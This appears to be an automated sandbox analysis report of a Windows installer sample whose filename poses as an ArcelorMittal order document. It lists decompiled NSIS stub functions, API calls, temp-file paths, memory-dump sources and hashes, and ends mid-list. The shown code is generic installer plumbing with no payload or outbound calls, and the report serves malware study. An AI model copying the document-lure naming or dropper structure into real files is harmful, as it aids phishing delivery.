                                                              0x00000000
                                                              0x00000000
                                                              0x004025bc
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp$C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll
                                                              • API String ID: 3109718747-2222174924
                                                              • Opcode ID: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
                                                              • Instruction ID: a78273f1e820df777bc5fa4653ad4ee3f77bb41165bb33dae94d39b2abea877a
                                                              • Opcode Fuzzy Hash: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
                                                              • Instruction Fuzzy Hash: FC110A72A41304BEDB10AFB18F4AE9E3665AF54355F60803BF501F61C1DAFC8E51466E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E00405AEE(void* __eflags, intOrPtr _a4) {
                                                              				int _t11;
                                                              				signed char* _t12;
                                                              				intOrPtr _t18;
                                                              				intOrPtr* _t21;
                                                              				signed int _t23;
                                                              
                                                              				E00406032(0x7a4748, _a4);
                                                              				_t21 = E00405A91(0x7a4748);
                                                              				if(_t21 != 0) {
                                                              					E004062C6(_t21);
                                                              					if(( *0x7a8a58 & 0x00000080) == 0) {
                                                              						L5:
                                                              						_t23 = _t21 - 0x7a4748 >> 1;
                                                              						while(1) {
                                                              							_t11 = lstrlenW(0x7a4748);
                                                              							_push(0x7a4748);
                                                              							if(_t11 <= _t23) {
                                                              								break;
                                                              							}
                                                              							_t12 = E00406375();
                                                              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                              								E00405A32(0x7a4748);
                                                              								continue;
                                                              							} else {
                                                              								goto L1;
                                                              							}
                                                              						}
                                                              						E004059E6();
                                                              						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                              					}
                                                              					_t18 =  *_t21;
                                                              					if(_t18 == 0 || _t18 == 0x5c) {
                                                              						goto L1;
                                                              					} else {
                                                              						goto L5;
                                                              					}
                                                              				}
                                                              				L1:
                                                              				return 0;
                                                              			}








                                                              0x00405afa
                                                              0x00405b05
                                                              0x00405b09
                                                              0x00405b10
                                                              0x00405b1c
                                                              0x00405b2c
                                                              0x00405b2e
                                                              0x00405b46
                                                              0x00405b47
                                                              0x00405b4e
                                                              0x00405b4f
                                                              0x00000000
                                                              0x00000000
                                                              0x00405b32
                                                              0x00405b39
                                                              0x00405b41
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405b39
                                                              0x00405b51
                                                              0x00000000
                                                              0x00405b65
                                                              0x00405b1e
                                                              0x00405b24
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405b24
                                                              0x00405b0b
                                                              0x00000000

                                                              APIs
                                                                • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                                • Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,0040A300,00405B05,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                                • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
                                                                • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405B47
                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: 4.v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nspD224.tmp
                                                              • API String ID: 3248276644-1882814062
                                                              • Opcode ID: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
                                                              • Instruction ID: 3bddcdf43bb23baaa909825d7db9bcd58a82d3117edc1a0c43d32c447e9df16d
                                                              • Opcode Fuzzy Hash: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
                                                              • Instruction Fuzzy Hash: F4F0F429104D6216C232723A1C49AAF3564CF92364B1A063FBC51B12C1DF3CBD42CCAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                              				_Unknown_base(*)()* _t7;
                                                              				void* _t10;
                                                              				int _t14;
                                                              
                                                              				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                              				_t10 = GlobalAlloc(0x40, _t14);
                                                              				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                              				_t7 = GetProcAddress(_a4, _t10);
                                                              				GlobalFree(_t10);
                                                              				return _t7;
                                                              			}






                                                              0x10001619
                                                              0x10001625
                                                              0x10001632
                                                              0x10001639
                                                              0x10001642
                                                              0x1000164e

                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                              • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                              • String ID:
                                                              • API String ID: 1148316912-0
                                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00401CFA() {
                                                              				void* _t18;
                                                              				struct HINSTANCE__* _t22;
                                                              				struct HWND__* _t25;
                                                              				void* _t27;
                                                              
                                                              				_t25 = GetDlgItem( *(_t27 - 0xc),  *(_t27 - 0x28));
                                                              				GetClientRect(_t25, _t27 - 0x54);
                                                              				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402BBF(_t22), _t22,  *(_t27 - 0x4c) *  *(_t27 - 0x24),  *(_t27 - 0x48) *  *(_t27 - 0x24), 0x10));
                                                              				if(_t18 != _t22) {
                                                              					DeleteObject(_t18);
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
                                                              				return 0;
                                                              			}







                                                              0x00401d06
                                                              0x00401d0d
                                                              0x00401d3c
                                                              0x00401d44
                                                              0x00401d4b
                                                              0x00401d4b
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D00
                                                              • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                              • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
                                                              • Instruction ID: b0c4edec147008cd01dbb3001b95c609c297ceb5d42f7dfd9ff58b90d4b754cd
                                                              • Opcode Fuzzy Hash: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
                                                              • Instruction Fuzzy Hash: D2F0F472500504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E0040494D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                              				char _v68;
                                                              				char _v132;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t23;
                                                              				signed int _t24;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t44;
                                                              				signed int _t46;
                                                              				signed int _t50;
                                                              				signed int _t52;
                                                              				signed int _t53;
                                                              				signed int _t55;
                                                              
                                                              				_t23 = _a16;
                                                              				_t53 = _a12;
                                                              				_t44 = 0xffffffdc;
                                                              				if(_t23 == 0) {
                                                              					_push(0x14);
                                                              					_pop(0);
                                                              					_t24 = _t53;
                                                              					if(_t53 < 0x100000) {
                                                              						_push(0xa);
                                                              						_pop(0);
                                                              						_t44 = 0xffffffdd;
                                                              					}
                                                              					if(_t53 < 0x400) {
                                                              						_t44 = 0xffffffde;
                                                              					}
                                                              					if(_t53 < 0xffff3333) {
                                                              						_t52 = 0x14;
                                                              						asm("cdq");
                                                              						_t24 = 1 / _t52 + _t53;
                                                              					}
                                                              					_t25 = _t24 & 0x00ffffff;
                                                              					_t55 = _t24 >> 0;
                                                              					_t46 = 0xa;
                                                              					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                              				} else {
                                                              					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                              					_t50 = 0;
                                                              				}
                                                              				_t31 = E00406054(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                              				_t33 = E00406054(_t44, _t50, _t55,  &_v132, _t44);
                                                              				_t34 = E00406054(_t44, _t50, 0x7a1f40, 0x7a1f40, _a8);
                                                              				wsprintfW(_t34 + lstrlenW(0x7a1f40) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                              				return SetDlgItemTextW( *0x7a7a18, _a4, 0x7a1f40);
                                                              			}



















                                                              0x00404956
                                                              0x0040495b
                                                              0x00404963
                                                              0x00404964
                                                              0x00404971
                                                              0x00404979
                                                              0x0040497a
                                                              0x0040497c
                                                              0x0040497e
                                                              0x00404980
                                                              0x00404983
                                                              0x00404983
                                                              0x0040498a
                                                              0x00404990
                                                              0x00404990
                                                              0x00404997
                                                              0x0040499e
                                                              0x004049a1
                                                              0x004049a4
                                                              0x004049a4
                                                              0x004049a8
                                                              0x004049b8
                                                              0x004049ba
                                                              0x004049bd
                                                              0x00404966
                                                              0x00404966
                                                              0x0040496d
                                                              0x0040496d
                                                              0x004049c5
                                                              0x004049d0
                                                              0x004049e6
                                                              0x004049f7
                                                              0x00404a13

                                                              APIs
                                                              • lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 004049EE
                                                              • wsprintfW.USER32 ref: 004049F7
                                                              • SetDlgItemTextW.USER32(?,007A1F40), ref: 00404A0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
                                                              • Instruction ID: b64f68613590d753eae0667b1f9c1485f74a5586c4fdc6504f9435c9407cab2f
                                                              • Opcode Fuzzy Hash: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
                                                              • Instruction Fuzzy Hash: EC11D87360412827EB10A66D9C41EDF329C9B82334F150237FA65F21D1EA78C82682E8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405A91(WCHAR* _a4) {
                                                              				WCHAR* _t5;
                                                              				short* _t7;
                                                              				WCHAR* _t10;
                                                              				short _t11;
                                                              				WCHAR* _t12;
                                                              				void* _t14;
                                                              
                                                              				_t12 = _a4;
                                                              				_t10 = CharNextW(_t12);
                                                              				_t5 = CharNextW(_t10);
                                                              				_t11 =  *_t12;
                                                              				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                              					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                              						L10:
                                                              						return 0;
                                                              					} else {
                                                              						_t14 = 2;
                                                              						while(1) {
                                                              							_t14 = _t14 - 1;
                                                              							_t7 = E00405A13(_t5, 0x5c);
                                                              							if( *_t7 == 0) {
                                                              								goto L10;
                                                              							}
                                                              							_t5 = _t7 + 2;
                                                              							if(_t14 != 0) {
                                                              								continue;
                                                              							}
                                                              							return _t5;
                                                              						}
                                                              						goto L10;
                                                              					}
                                                              				} else {
                                                              					return CharNextW(_t5);
                                                              				}
                                                              			}









                                                              0x00405a9a
                                                              0x00405aa1
                                                              0x00405aa4
                                                              0x00405aa6
                                                              0x00405aac
                                                              0x00405ac4
                                                              0x00405ae6
                                                              0x00000000
                                                              0x00405acc
                                                              0x00405ace
                                                              0x00405acf
                                                              0x00405ad2
                                                              0x00405ad3
                                                              0x00405adc
                                                              0x00000000
                                                              0x00000000
                                                              0x00405adf
                                                              0x00405ae2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405ae2
                                                              0x00000000
                                                              0x00405acf
                                                              0x00405abb
                                                              0x00000000
                                                              0x00405abc

                                                              APIs
                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,0040A300,00405B05,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                              • CharNextW.USER32(00000000), ref: 00405AA4
                                                              • CharNextW.USER32(00000000), ref: 00405ABC
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 00405A92
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp
                                                              • API String ID: 3213498283-89864070
                                                              • Opcode ID: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
                                                              • Instruction ID: 0cb906ce55498ce86d0db88686860b14f8f146b66f9f6c0e4bde91ccc4fe9cfd
                                                              • Opcode Fuzzy Hash: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
                                                              • Instruction Fuzzy Hash: E2F09611B10F1195DF3176545CC5A7B6AB8EB94354B04863BD602B72C0D7B84D818F99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E004059E6(WCHAR* _a4) {
                                                              				WCHAR* _t9;
                                                              
                                                              				_t9 = _a4;
                                                              				_push( &(_t9[lstrlenW(_t9)]));
                                                              				_push(_t9);
                                                              				if( *(CharPrevW()) != 0x5c) {
                                                              					lstrcatW(_t9, 0x40a014);
                                                              				}
                                                              				return _t9;
                                                              			}




                                                              0x004059e7
                                                              0x004059f4
                                                              0x004059f5
                                                              0x00405a00
                                                              0x00405a08
                                                              0x00405a08
                                                              0x00405a10

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 004059EC
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 004059F6
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405A08
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004059E6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
